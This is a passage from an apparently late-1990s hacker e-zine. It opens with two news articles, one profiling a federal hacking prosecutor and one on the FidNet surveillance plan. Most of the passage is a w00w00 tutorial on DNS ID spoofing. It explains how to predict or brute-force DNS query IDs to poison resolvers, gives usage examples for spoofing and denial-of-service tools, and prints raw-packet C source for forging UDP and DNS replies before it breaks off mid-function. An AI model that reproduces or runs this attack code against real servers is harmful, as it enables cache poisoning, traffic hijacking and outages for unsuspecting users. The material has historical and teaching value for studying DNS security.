call. Mitnick was sentenced to 46 months in prison and ordered to pay $4,125 to the companies he victimized. After the hearing, Schindler said he is leaving the U.S. attorney's office after a 10-year stint during which he won convictions of a list of defendants that reads like a hacking hall of fame. Besides Mitnick, Schindler also prosecuted Kevin Poulsen, Ron Austin, Justin Petersen and Lewis DePayne--more hackers than any other federal prosecutor has faced. Along the way, Schindler played a leading role in a number of major white-collar crime cases, most notably winning a conviction of former Arizona Gov. Fife Symington on bank fraud charges in 1997. "I've had just a fabulous run in this office," Schindler said. "I've been fortunate to have the greatest mix of cases I could ever have imagined." Nevertheless, Schindler is leaving in October for a position as a partner in the law firm Latham & Watkins, where he will be part of the firm's vast intellectual property team and where his salary will easily exceed the $115,000 a year he earned as a federal prosecutor. During his years as an assistant U.S.attorney in Los Angeles, Schindler built a reputation as an unflappable litigator--circumspect, forthright and respected by even his adversaries. "He is an exceptionally talented prosecutor," said Richard Sherman, who represented DePayne and, for a short while, Mitnick. "In the Symington case, he was fighting a well-financed political giant, and he acquitted himself admirably." There was a recent setback in the Symington case. A federal appeals court overturned the conviction, ruling that the judge in the case improperly dismissed one of the jurors. Schindler said the government has asked the appeals court to reconsider. At 37, Schindler is about the same age as the hackers he prosecuted, and though he may not relish the thought, he has a few things in common with them. Like most, he is a native Southern Californian, unusually disciplined in his craft and with a head for the complexities of computer crime. But unlike many hackers, Schindler was never particularly interested in technology, was fairly popular in school and came from a stable family. His father, now deceased, was a courtroom translator. His mother is an executive with a music publishing company. Schindler earned a degree in psychology from UC Berkeley, a law degree at UCLA and joined the U.S. attorney's office in 1989. Over the course of the next few years, Southern California became a hotbed of hacking crimes, and Schindler handled the high-profile cases. None of the cases ever went to trial.But he extracted guilty pleas from Poulsen and Austin, who had rigged radio station call-in contests to win a pair of Porsches; Petersen, who once illegally wired $150,000 from a bank; Mitnick, who swiped source code from giant technology companies; and DePayne, Mitnick's longtime accomplice. With those cases behind him now, Schindler offered his thoughts on those defendants. Poulsen "really generates the most complicated feelings for me," Schindler said. "He was probably the brightest, and he had the ability to create more harm. But I'm proud of him and the way he's turned his life around." After serving his five-year sentence, Poulsen has established a budding career in journalism, writing stories for Wired magazine and columns for ZDNet.com. Austin was "an unfortunate follower," Schindler said. "I don't think I've ever seen anybody as frightened as he was when he was arrested. It was clear he was not cut out for a life of crime." Austin now works at a computer store in West Los Angeles. Petersen, a flamboyant hacker known for schmoozing minor celebrities and porn stars, was behind some of Schindler's more embarrassing moments. Petersen engaged in illegal hacking even while working as a government informant. When Schindler confronted Petersen about this at the federal courthouse, Petersen ducked out of their meeting, ran down the courthouse steps and became a fugitive. "What a piece of work," Schindler said. "I don't think I've ever met a person in my life who has had so many aborted attempts at walking the straight and narrow, someone whose own arrogance has caused him to self-destruct so many times." For his part, Petersen's occasional comments about Schindler are mostly unprintable. Petersen was recently released after a probation violation, and is now reportedly trying to start an Internet porn company. Schindler seems to have the most contempt for Mitnick. He is a "strange, in some senses pathetic, misguided human being," Schindler said. "I don't hold a lot of confidence that he will turn his life around." Of course, Mitnick would probably not be complimentary toward Schindler either. The notoriously obsessive hacker, who is still in jail, has long believed that he has been treated unfairly, and has even accused the government of tampering with witnesses, a charge Schindler vehemently denies. Surprisingly, other hackers have a fairly charitable view of Schindler, who is married and has a 1-year-old daughter. "He was a very tough prosecutor," Austin said. "But looking at it in retrospect, I think he was fair. When you compare him to everybody else out there, he's head and shoulders above the rest." Poulsen too holds Schindler in relatively high regard. In contrast to other prosecutors, Schindler "charged [me] with crimes I actually committed," Poulsen said. "It was refreshing. I'm not crazy about prosecutors, but what more can you ask for?" In his new job, Schindler will be handling trade secret thefts and other work involving large companies. But he admits he may also be called upon to do criminal work, meaning he could be defending the kinds of people he once prosecuted. "Could I be defending a Mitnick?" he asked, anticipating the direction of the interview. "I won't be in that position. Most hackers aren't able to afford private practice [defense attorneys]." Times staff writer Greg Miller can be reached at greg.miller@latimes.com. Copyright Los Angeles Times @HWA 32.0 NIPC Head Talks About FidNet ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Richard Clarke, the National Coordinator for Security, Infrastructure Protection and Counterterrorism, says that the recent hysteria over the proposed FIDNet is unwarranted. The proposal calls for the GSA to control the IDS network and not the FBI as previously thought. He said that once lawmakers actually read the proposal and understand how it works opposition will fade away. NY Times - registration required http://www.nytimes.com/library/tech/99/08/biztech/articles/16monitor.html August 16, 1999 Author of Computer Surveillance Plan Tries to Ease Fears By TIM WEINER ASHINGTON -- Congress has blocked money for a planned system to safeguard government computers, a prominent Republican has denounced the system as "Orwellian" and some civil libertarians are calling it a potential threat. But the plan's author, a senior National Security Council official, says those are only temporary setbacks to a critically needed system that will be built if President Clinton wants it. The proposed system, called Fidnet, is intended to protect government computers from hackers, whether they be precocious teen-agers or potential terrorists, administration officials say. It represents "the first attempt by any nation to develop a plan to defend its cyberspace," a draft plan by the security council says. The White House is seeking $1.5 billion in new spending for the program. Although Fidnet has been in the works for more than a year, many in Congress learned about it on July 28, when The New York Times published details of the draft proposal. The reaction was swift. Two days later, the House Appropriations Committee deleted $2 million in start-up money requested by the FBI to develop the system. Then the House majority leader, Rep. Dick Armey, R-Texas, denounced Fidnet, saying it raised "the Orwellian possibility that unscrupulous government bureaucrats could one day use such a system to read our personal e-mail." But the principal author of the plan, Richard Clarke, the National Security Council's counterterrorism czar, said Congress would assuredly finance the system once lawmakers understood it and Clinton gave it the go-ahead. "If the president approves Fidnet, there'll be funding for it," he said in an interview. Clarke, whose formal title is National Coordinator for Security, Infrastructure Protection and Counterterrorism, has been warning for years about the threat of an "electronic Pearl Harbor" in the form of an attack on government computers. He said that a cyberspace assault would be "as bad as being attacked by bombs," and that "an attack on American cyberspace is an attack on the United States" that should trigger a military response. These fears led last year to a new initiative, called Presidential Decision Directive 63. Fidnet is one of the first major computer-security programs to grow out of the directive. It would cover civilian agencies, like the State Department and the IRS, and would be modeled on and linked to an existing Pentagon security system. Ultimately, the plan calls for private companies to create security links to the government's systems. Clarke acknowledged that no one in Congress had been briefed on Fidnet, which has not yet been given a go-ahead by President Clinton, and that the draft plan had raised questions among civil libertarians who say it has a potential power to monitor innocent citizens. But he said Congress and the system's critics had the wrong idea about the planned surveillance network. The critics among the civil libertarians question the FBI's role in the computer monitoring scheme. The bureau already has a centralized security operation called the National Infrastructure Protection Center, based in its headquarters, that has received technical support from the National Security Agency, the intelligence service that eavesdrops on the rest of the world, and from the CIA. The New York Times reported that the Fidnet system, too, would be overseen by the FBI. Clarke's draft plan calls for the National Infrastructure Protection Center to play a role in analyzing and responding to any signs of intrusion. But Clarke said in the interview that while some funds requested for Fidnet were earmarked for the Justice Department and the bureau, the system "would not be run by the FBI." Instead, he said, it would be established by the General Services Administration, an independent agency better known for furnishing government offices than for law enforcement. "It would not be monitoring privately owned and operated systems, only government computers," Clarke said. "And it would not violate people's privacy rights." He conceded that failing to brief Congress was a mistake. Because Congress already has a system to detect unauthorized intrusions into its information systems, it should realize that "all that Fidnet would be would be the same kind of thing for sensitive government computers," Clarke said. "Congress has concerns about Justice being the funding source to pay for intrusion detection mechanisms," he said. "That's a legitimate concern. When they get the briefing they'll see there's a requirement to have something like Fidnet." @HWA 33.0 Spoofing revisited (w00w00) ~~~~~~~~~~~~~~~~~~~~~~~~~~~ DNS ID Hacking -------------- Brought to you by: Raw-Powa and w00w00 Security Development (WSD) --[1]-- DNS ID Hacking Presentation w00w00! Hi. You might be wondering what DNS ID Hacking (or Spoofing) is. DNS ID Hacking isn't the usual way of hacking/spoofing (such jizz or any-erect). This method is based on a vulnerability on DNS Protocol. This affects several DNS implementations (including WinNT's DNS and BIND, for example). --[1.1]-- DNS Protocol Mechanism For the first step, you will need to know how the DNS works. We will only explain the most important parts of this protocol. In order to do that, we will follow the steps of a DNS request packet from A to Z! 1: The client (bla.bibi.com) sends a request of resolution from the domain "www.heike.com". To resolve the name, bla.bibi.com uses "ns.bibi.com" for DNS. Let's take a look at the following diagram: /----------------------------------\ | 111.1.2.123 = bla.bibi.com | | 111.1.2.222 = ns.bibi.com | | format: | | IP_ADDR:PORT->IP_ADDR:PORT | | ex: | | 111.1.2.123:2999->111.1.2.222:53 | \----------------------------------/ ... gethostbyname("www.heike.com"); ... [bla.bibi.com] [ns.bibi.com] 111.1.2.123:1999 --->[?www.heike.com]------> 111.1.2.222:53 Here we see our resolution name request from source port 1999, requesting the resolution from the DNS on port 53. [note: The DNS is always on port 53] Now that ns.bibi.com has received the resolution request from bla.bibi.com, ns.bibi.com will have to resolve the name, let's look at it... [ns.bibi.com] [ns.internic.net] 111.1.2.222:53 -------->[dns?www.heike.com]----> 198.41.0.4:53 ns.bibi.com asks ns.internic.net, which is the root name server, for the address of www.heike.com, and if it doesn't have it and sends the request to a name server which has authority over '.com' domains. >>> it can have the NS record for heike.com, and not the A/CNAME for >>> www.heike.com (this is the normal case). Also, you're not asking >>> ns.internic.net, you're asking one of the root servers for >>> COM directly. [note: We ask to internic because it could have this request in its cache] [ns.internic.net] [ns.bibi.com] 198.41.0.4:53 ------>[ns for.com is 144.44.44.4]------> 111.1.2.222:53 Here we can see that ns.internic.net answered to ns.bibi.com (which is the NS that has authority over the domain bibi.com) with the name server of for.com (which is the authority over '.com' domains), which has the IP address 144.44.44.4 [let's call it ns.for.com]. Now our ns.bibi.com will ask ns.for.com for the address of www.heike.com, but this one doesn't have it, so it will forward the request to the DNS of heike.com which has authority over heike.com as shown here: [ns.bibi.com] [ns.for.com] 111.1.2.222:53 ------>[?www.heike.com]-----> 144.44.44.4:53 The answer from ns.for.com is: [ns.for.com] [ns.bibi.com] 144.44.44.4:53 ------>[ns for heike.com is 31.33.7.4]---> 144.44.44.4:53 Now that we know which IP address has authority on the domain "heike.com" [we'll call it ns.heike.com], we ask it what the IP address of the machine www (www.heike.com) is: [ns.bibi.com] [ns.heike.com] 111.1.2.222:53 ----->[?www.heike.com]----> 31.33.7.4:53 And now at least, we have our answer: [ns.heike.com] [ns.bibi.com] 31.33.7.4:53 ------->[www.heike.com == 31.33.7.44] ----> 111.1.2.222:53 We can now forward it to our client bla.bibi.com: [ns.bibi.com] [bla.bibi.com] 111.1.2.222:53 ------->[www.heike.com == 31.33.7.44]----> 111.1.2.123:1999 Now bla.bibi.com knows the IP address of www.heike.com :) So.. now let's imagine the opposite; that we'd like to have the name of a machine from its IP address. In order to do that, the way to proceed will be a little different because the IP address will have to be transformed: Example: 100.20.40.3 will become 3.40.20.100.in-addr.arpa Attention!! This method is only for the IP resolution request (reverse DNS) So let's look at practical example when we take the IP of www.heike.com (31.33.7.44 or "44.7.33.31.in-addr.arpa" after the translation into a comprehensible format for the DNS). ... gethostbyaddr("31.33.7.44"); ... We send our request to ns.bibi.com (our name server): [bla.bibi.com] [ns.bibi.com] 111.1.2.123:2600 ----->[?44.7.33.31.in-addr.arpa]-----> 111.1.2.222:53 ns.bibi.com sends the request for the name of machine that is 44.7.33.31.in-addr.arpa to ns.internic.net: [ns.bibi.com] [ns.internic.net] 111.1.2.222:53 ----->[?44.7.33.31.in-addr.arpa]------> 198.41.0.4:53 ns.internic.net will send the IP address of a name server which has authority on '31.in-addr.arpa': [ns.internic.net] [ns.bibi.com] 198.41.0.4:53 --> [NS for 31.in-addr.arpa is 144.44.44.4] -> 111.1.2.222:53 Now ns.bibi.com will ask the same question to the DNS at 144.44.44.4: [ns.bibi.com] [ns.for.com] 111.1.2.222:53 ----->[?44.7.33.31.in-addr.arpa]------> 144.44.44.4:53 And so on... In fact the mechanism is almost identical to the one used for name resolution. I hope you understood the dialog on how DNS works. Now let's study DNS messages format. --[1.2]-- DNS packet Here is the format of a DNS message : +---------------------------+---------------------------+ | ID (the famous :) | flags | +---------------------------+---------------------------+ | numbers of questions | numbers of answer | +---------------------------+---------------------------+ | number of RR authority |number of supplementary RR | +---------------------------+---------------------------+ | | \ \ \ QUESTION \ | | +-------------------------------------------------------+ | | \ \ \ ANSWER \ | | +-------------------------------------------------------+ | | \ \ \ Stuff etc.. No matter \ | | +-------------------------------------------------------+ --[1.3]-- Structure of DNS packets. __ID__ The ID is to identify each DNS packet, since exchanges between name servers are from port 53 to port 53, and it receive more than one >>> not necessarilly; DNS is allowed to bind any client port, and the >>> DNS ID is also needed for asynchronous client resolvers (which >>> might need to make more than one simultaneous query) request at a time, so the ID is the only way to recognize the different DNS requests. We'll talk about it a little more later.. __flags__ The flags area is divided into several parts: 4 bits 3 bits (always 0) | | | | [QR | opcode | AA| TC| RD| RA | zero | rcode ] | | |__|__|__| |______ 4 bits | |_ 1 bit | 1 bit QR = If the QR bit is 0, it means that the packet is a question, otherwise it's an answer. opcode = If the value is 0 for a normal request, 1 for a reserve request, and 2 for a status request (we don't need to know all these modes). AA = If it is equal to 1, it says that the name server has an authoritative answer. TC = This is unimportant. RD = If this flag is to 1, it means "Recursion Request", for example when bla.bibi.com asks ns.bibi.com to resolve the name, the flag tells the DNS to assume this request. RA = If this is set to 1, it means that recursion is available. This bit is set to 1 in the answer of the name server if it supports recursion. Zero = Here are three zeroes... rcode = It contains the error messages returned from DNS requests. If 0, it means "no error", 3 means "name error" The 2 following flags don't have any importance to us. DNS QUESTION: Here is the format of a DNS question : +-----------------------------------------------------------------------+ | name of the question | +-----------------------------------------------------------------------+ | type of question | type of query | +--------------------------------+--------------------------------------+ The structure of the question is like this. Example: www.heike.com is [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] This is always the same for an IP address. This splits www.heike.com into three parts: "www", "heike", and "com". The number in front of each part specifies the length. It is also terminated by 0. 44.33.88.123.in-addr.arpa would be: [2|4|4|2|3|3|2|8|8|3|1|2|3|7|i|n|-|a|d|d|r|4|a|r|p|a|0] [note]: a compression format exists, but we won't use it. type of question: Here are the values that we will use most of the time: [note]: There are more than 20 types of different values(!) and I'm fed up with writing :)) name value A | 1 | IP Address (for resolving a name to an IP) PTR | 12 | Pointer (for resolving an IP to a name) type of query: The values are the same as the type of question's values (I'm not sure it's true, but you should look through RFCs 1033-1035 and 1037). DNS ANSWER: The answers have a format that we call RR. Here is the format of an answer (an RR): +------------------------------------------------------------------------+ | name of the domain | +------------------------------------------------------------------------+ | type | class | +----------------------------------+-------------------------------------+ | TTL (time to live) | +------------------------------------------------------------------------+ | resource data length | | |----------------------------+ | | resource data | +------------------------------------------------------------------------- name of the domain: The domain name is stored in the same way that the question for the resolution request of www.heike.com. The flag "name of the domain" will contain: [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]. type: The type flag is the same than "type of query" in the question part of the packet. class: The class flag is equal to 1 for Internet data. time to live: This flag explains in seconds the time-life of the informations into the name server cache. resource data length: The length of resource data, for example if resource data length is 4, it means that the data in resources data are 4 bytes long. resource data: here we put the IP for example (at least in our case) As an example, this is what occurs when ns.bibi.com asks ns.heike.com for www.heike.com's address: ns.bibi.com:53 ---> [?www.heike.com] ----> ns.heike.com:53 +---------------------------------+--------------------------------------+ | ID = 1999 | QR = 0 opcode = 0 RD = 1 | +---------------------------------+--------------------------------------+ | numbers of questions = htons(1) | numbers of answers = 0 | +---------------------------------+--------------------------------------+ | number of RR authoritative = 0 | number of supplementary RR = 0 | +---------------------------------+--------------------------------------+ +------------------------------------------------------------------------+ | name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] | +------------------------------------------------------------------------+ | type of question = htons(1) | type of query=htons(1) | +---------------------------------+--------------------------------------+ Now let's look at the answer from ns.heike.com: ns.heike.com:53 -->[IP of www.heike.com is 31.33.7.44] --> ns.bibi.com:53 +---------------------------------+---------------------------------------+ | ID = 1999 | QR=1 opcode=0 RD=1 AA =1 RA=1 | +---------------------------------+---------------------------------------+ | numbers of questions = htons(1) | numbers of answers = htons(1) | +---------------------------------+---------------------------------------+ | number of RR authoritative = 0 | number of supplementary RR = 0 | +---------------------------------+---------------------------------------+ +-------------------------------------------------------------------------+ | name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] | +-------------------------------------------------------------------------+ | type of question = htons(1) | type of query = htons(1) | +-------------------------------------------------------------------------+ +-------------------------------------------------------------------------+ | name of the domain = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] | +-------------------------------------------------------------------------+ | type = htons(1) | class = htons(1) | +-------------------------------------------------------------------------+ | time to live = 999999 | +-------------------------------------------------------------------------+ | resource data length = htons(4) | resource data=inet_addr("31.33.7.44") | +-------------------------------------------------------------------------+ Yah! That's all for now :)) Here is an analysis: In the answer QR = 1 because it's an answer :) AA = 1 because the name server has authority in its domain RA = 1 because recursion is available I hope you understood that because you will need it for the following events. --[2.0]-- DNS ID hack/spoof Now it's time to clearly explain what DNS ID hacking/spoofing is. Like we explained before, the only way for the DNS to recognize the different questions/answers is the ID flag in the packet. Look at this example: ns.bibi.com;53 ----->[?www.heike.com] ------> ns.heike.com:53 So you only have to spoof the ip of ns.heike.com and answer your false information before ns.heike.com does first! ns.bibi.com <------- . . . . . . . . . . . ns.heike.com | |<--[IP for www.heike.com is 1.2.3.4]<-- hum.roxor.com But in practice you have to guess the good ID. If you are on a LAN, you can sniff to get this ID and answer before the name server (it's easy on a Local Network :) If you want to do this remotely you don't have a lot a choices, but you do have 4 basic methods: 1.) Randomly test all the possible values of the ID flag. You must answer before the NS (ns.heike.com in this example)! This method is obsolete unless you want to know the ID or any other favorable condition to its prediction. >>> This method is not obsolete --- it's how real attacks work. It takes less than a minute on a DS1 to exhaustively search all the ID's, and if you flood (or crash) the authority servers for the resource record you're trying to inject, you have all the time in the world to do it. This is the problem that the current DNS protocol can't fix. 2.) Send some DNS requests (200 or 300) in order to increase the chances of falling on the good ID. >>> This is analogous to using 200 or 300 responses (both consume ID space), except that naieve DNS servers might not detect 300 queries, even if they do detect 300 wrong answers. 3.) Flood the DNS in order to avoid its work. The name server will crash and show the following error! >> Oct 06 05:18:12 w00w00 named[1913]: db_free: DB_F_ACTIVE set - ABORT at this time named is out of order :) 4.) Or you can use the vulnerability in BIND discovered by SNI (Secure Networks, Inc.) with ID prediction (we will discuss this in a bit). ##################### Windows ID Vulnerability ########################### I haven't tested this on WinNT, but Windows ID's are extremely easy to predict because it is '1' by default, and '2' for the second question (if they are 2 questions at the same time). ######################## BIND Vulnerability ############################## There is a vulnerability in BIND (discovered by SNI as stated earlier) >>> we didn't discover this; it's old news. We released an advisory on >>> how much easier it is to exploit than the old papers let on. that we will be using. In fact, DNS IDs are easily predictable; you only have to sniff a DNS in order to do what you want. Let me explain... The DNS uses a random ID at the beginning but it only increases this ID for the next question. It's easy to exploit this vulnerability. Here is the way: 1. Be able to sniff easily the messages that comes to a random DNS (ex. ns.dede.com for this sample). 2. You ask NS.victim.com to resolve .dede.com, and NS.victim.com will ask ns.dede.com to resolve .dede.com ns.victim.com ---> [?.dede.com ID = 444] ---> ns.dede.com 3. Now we have the ID of the message from NS.victim.com, now you know what ID area you'll have to use. (ID = 444 in this sample). 4. You then make your resolution request. ex. www.microsoft.com to NS.victim.com (you) ---> [?www.microsoft.com] ---> ns.victim.com ns.victim.com --> [?www.microsoft.com ID = 446 ] --> ns.microsoft.com 5. Flood the name server ns.victim.com with the ID (444) you already have and then you increase this by one. ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 444] --> ns.victim.com ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 445] --> ns.victim.com ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 446] --> ns.victim.com ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 447] --> ns.victim.com ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 448] --> ns.victim.com ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 449] --> ns.victim.com Now you know that DNS IDs are predictable, and they only increase. You flood ns.victim.com with spoofed answers with the ID 444+ ;) >>> That's not true on OpenBSD (random scoreboarded IDs). [Note: WSDspoofID does this] There is another way to exploit this vulnerability without a root on any NS. The mechanism is very simple. Here is the explanation: We send to ns.victim.com a resolution request for *.provnet.fr (you) ----------[?(random).provnet.fr] -------> ns.victim.com Then, ns.victim.com asks ns1.provnet.fr to resolve .provnet.fr. There is nothing new here, but this is where the interesting part begins here. At this point you begin to flood ns.victim.com with spoofed answers (with ns1.provnet.fr IP) with IDSs from 100 to 110: (spoof) ----[.provnet.fr is 1.2.3.4 ID=100] --> ns.victim.com (spoof) ----[.provnet.fr is 1.2.3.4 ID=101] --> ns.victim.com (spoof) ----[.provnet.fr is 1.2.3.4 ID=102] --> ns.victim.com (spoof) ----[.provnet.fr is 1.2.3.4 ID=103] --> ns.victim.com ... After that, we ask ns.victim.com if .provnet.fr has an IP address. If ns.victim.com give us an IP address for .provnet.fr then we have found the correct! Otherwise, we have to repeat this attack until we find the ID. It's a bit long but it's effective. [Note: This is how WSD-IDpred works] ########################################################################## Here you will find 5 programs WSDkillDNS - very simple DNS spoofer WSDsniffID - sniff a LAN and reply false DNS answers before the NS WSDspoofID - a DNS ID spoofer (you'll need to be root on a NS) WSD-IDpred - a DNS ID predictor (no need to be root on a NS) WSD-baddns - a very simple denial of service attack to disable DNS Note: You can find source and binaries of these programs at ftp.w00w00.org/pub/DNS. You need to install libpcap on your machine before any compilation of the w00w00 ID programs. - w00w00 Security Development (WSD) See http://www.w00w00.org and ftp://ftp.w00w00.org/pub Thanks to: pirus, Heike, and all of w00w00 Security Development (WSD), and Asriel. Special Thanks to: ackboo and Secure Networks, Inc. (SNI) at www.secnet.com for finding the vulnerability. /* I'm a w00w00ify'd w00c0w */ Here is a HOWTO on the w00w00 ID tools: ----[HOWTO]---- I've decided to make a little HOWTO because the w00w00 ID tools are not very user friendly for a beginner :) 1: WSD-baddns WSD-baddns is a program to destroy the DNS. It's very, very simple to use !!! :) /* I'm a w00w00ify'd w00c0w */ Usage: WSD-baddns Example: WSD-baddns bob.lenet.fr 2: WSDsniffID WSDsniffID is a DNS hijacker. You need to have root privileges. It's for a LAN only :) Usage: WSDsniffID [type 1 or 12 ] '' by type we mean 1 = TYPE A 12 = TYPE PTR '' Example: WSDsniffID eth0 31.3.3.7 www.i.m.mucho.horny.ya 12 (We are hijacking a PTR) So now if someone runs "nslookup " on a network they have: [root@w00w00 w0w0w]# nslookup 1.2.3.4 Server: localhost Address: 127.0.0.1 Name: www.i.m.mucho.horny.ya Address: 1.2.3.4 3: --= WSDspoofID =-- 1) Before you need root on a NS with AUTH over a domain (for example shok.janova.org has authority over *.janova.org) WSDspoofID is a DNS ID predictor (but you need to have root on a NS or you need to the privileges to sniff the NS) Usage: WSDspoofID Example: WSDspoofID ppp0 NS2.MCI.NET janova.org shok.janova.org 12 www.i.m.ereet.ya 194.206.23.123 ns2.provnet.fr .. Well after that when you ask NS2.MCI.NET for 194.206.23.123 you have: [root@w00w00 w0w0w]# nslookup 194.206.23.123 ns2.mci.net Server: ns2.mci.net Address: 204.70.57.242 Name: www.i.m.ereet.ya Address: 194.206.23.123 [root@w00w00 w0w0w]# We will use ns2.provnet.fr because ns2.provnet.fr has AUTH on 194.206.23.* To find out who has AUTH on 194.206.23.*, you just need to do the following: [root@w00w00 w0w0w]# host -t NS 23.206.194.in-addr.arpa 23.206.194.in-addr.arpa name server NS2.PROVNET.FR 23.206.194.in-addr.arpa name server BOW.RAIN.FR 23.206.194.in-addr.arpa name server NS1.PROVNET.FR [root@w00w00 w0w0w]# To find out the NS who haas AUTH on, for example, *.provnet.fr: [root@w00w00 w0w0w]# host -t NS provnet.fr provnet.fr name server NS1.provnet.fr provnet.fr name server BOW.RAIN.fr provnet.fr name server NS2.provnet.fr [root@w00w00 w0w0w]# Note: The entry can change!!! You can get NS1 first. Here is the source... to our programs ----[ BUGS ]---- 1: The bit field on Solaris causes a bus error.. We will fix it soon ----[END of BUGS ]---- ----[WSD-spoof.c]---- /* ******************************************************************** */ /* w00w00 functions for spoofing UDP */ /* ------------------------------------------------------------------- */ /* w00w00 Security Development (WSD) */ /* Email: WSD@w00w00.org */ /* Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */ /* ******************************************************************** */ #include #include #include #include #include #include #include #include #include #include #include #include #include "ip.h" #include "udp.h" #define IPHDRSIZE sizeof(struct iphdr) #define UDPHDRSIZE sizeof(struct udphdr) /*****************************************************************************/ /* * in_cksum -- * Checksum routine for Internet Protocol family headers (C Version) */ /*****************************************************************************/ unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } int udp_send(s, saddr, daddr, sport, dport, datagram, datasize) int s; unsigned long saddr; unsigned long daddr; unsigned short sport; unsigned short dport; char *datagram; unsigned datasize; { int x; unsigned char *data; unsigned char packet[4024]; struct iphdr *ip; struct udphdr *udp; struct sockaddr_in sin; ip = (struct iphdr *)packet; udp = (struct udphdr *)(packet+IPHDRSIZE); data = (unsigned char *)(packet+IPHDRSIZE+UDPHDRSIZE); memset(packet, 0, sizeof(packet)); udp->source = htons(sport); udp->dest = htons(dport); udp->len = htons(UDPHDRSIZE+datasize); udp->check = 0; memcpy(data, datagram, datasize); memset(packet, 0, IPHDRSIZE); ip->saddr.s_addr = saddr; ip->daddr.s_addr = daddr; ip->version = 4; ip->ihl = 5; ip->ttl = 245; ip->id = random() % 5985 + 1; ip->protocol = IPPROTO_UDP; ip->tot_len = htons(IPHDRSIZE + UDPHDRSIZE + datasize); ip->check = 0; ip->check = in_cksum((char *)packet, IPHDRSIZE); sin.sin_family = AF_INET; sin.sin_addr.s_addr=daddr; sin.sin_port = udp->dest; x = sendto(s, packet, IPHDRSIZE+UDPHDRSIZE+datasize, 0, (struct sockaddr*)&sin, sizeof(struct sockaddr)); return(x); } /*****************************************************************************/ /* RECV PAKET */ /* get_pkt(socket, *buffer, size of the buffer); */ /*****************************************************************************/ int get_pkt(s, data, size) int s; unsigned char *data; int size; { struct sockaddr_in sin; int len, resu; len = sizeof(sin); resu = recvfrom(s, data, size, 0, (struct sockaddr *)&sin, &len); return resu; } ----[END of WSD-spoof.c]---- ----[WSD-DNS2.c]---- /* ****************************************************** */ /* w00w00 code for DNS packets Super Raw */ /* ------------------------------------------------------ */ /* w00w00 Security Development (WSD) */ /* Email: WSD@w00w00.org */ /* Sites: http://www.w00w00.org, ftp://ftp.w00w00.org/pub */ /* ****************************************************** */ #define ERROR -1 #define TYPE_A 1 #define TYPE_PTR 12 #define MAXLEN 64 #define DNSHDRSIZE 12 int myrand() { int j = 1 + (int)(150.0 * rand() / (RAND_MAX + 1.0)); return(j); } unsigned long host2ip(char *serv) { struct hostent *hent; struct sockaddr_in sinn; hent = gethostbyname(serv); if (hent == NULL) { herror("gethostbyname"); exit(ERROR); } bzero((char *)&sinn, sizeof(sinn)); bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length); return sinn.sin_addr.s_addr; } void nameformat(char *name, char *qs) { int i; int a = 0; char lol[3000]; char tmp[2550], tmp2[2550]; if (strlen(name) > sizeof(tmp) - 1) { fprintf(stderr, "nameformat(): name too long: %s\n", name); exit(ERROR); } bzero(lol, sizeof(lol)); bzero(tmp, sizeof(tmp)); bzero(tmp2, sizeof(tmp2)); for (i = 0; i < strlen(name); i++) { if (*(name+i) == '.') { sprintf(tmp2, "%c%s", a, tmp); strcat(lol, tmp2); bzero(tmp, sizeof(tmp)); bzero(tmp2, sizeof(tmp2)); a = 0; } else tmp[a++] = *(name+i); } sprintf(tmp2, "%c%s", a, tmp); strcat(lol, tmp2); strcpy(qs, lol); } void nameformatIP(char *ip, char *resu) { int i, a = 3, k = 0; char c; char *A[4]; char nameform[256]; char tmp[256], tmp1[256]; char *arpa = "in-addr.arpa"; if (strlen(ip) > sizeof(nameform) - 1) { fprintf(stderr, "nameformatIP(): name too long: %s\n", ip); exit(ERROR); } bzero(tmp, sizeof(tmp)); bzero(tmp1, sizeof(tmp1)); bzero(nameform, sizeof(nameform)); for (i = 0; i < 4; i++) { A[i] = (char *)malloc(4); if (A[i] == NULL) { perror("malloc"); exit(ERROR); } bzero(A[i], 4); } bzero(tmp, sizeof(tmp)); bzero(tmp1, sizeof(tmp1)); for (i = 0; i < strlen(ip); i++) { c = ip[i]; if (c == '.') { strcat(A[a], tmp); a--; k = 0; bzero(tmp, sizeof(tmp)); } else tmp[k++] = c; } strcat(A[a], tmp); for (i = 0; i < 4; i++) { strcat(tmp1, A[i]); strcat(tmp1, "."); } strcat(tmp1, arpa); nameformat(tmp1, nameform); strcpy(resu, nameform); } int makepacketQS(char *data, char *name, int type) { if (type == TYPE_A) { nameformat(name, data); *((u_short *) (data+strlen(data)+1)) = htons(TYPE_A); } if (type == TYPE_PTR) { nameformatIP(name,data); *((u_short *) (data+strlen(data)+1)) = htons(TYPE_PTR); } *((u_short *) (data+strlen(data)+3)) = htons(1); return(strlen(data)+5); } int makepacketAW(char *data, char *name, char *ip, int type) { int i; char tmp[2550]; bzero(tmp, sizeof(tmp)); if (type == TYPE_A) { nameformat(name, data); *((u_short *) (data+strlen(data)+1)) = htons(1); *((u_short *) (data+strlen(data)+3)) = htons(1); i = strlen(data)+5; strncpy(data+i, data, MAXLEN); i = i+strlen(data)+1; *((u_short *) (data+i)) = htons(TYPE_A); *((u_short *) (data+i+2)) = htons(1); *((u_long *) (data+i+4)) = 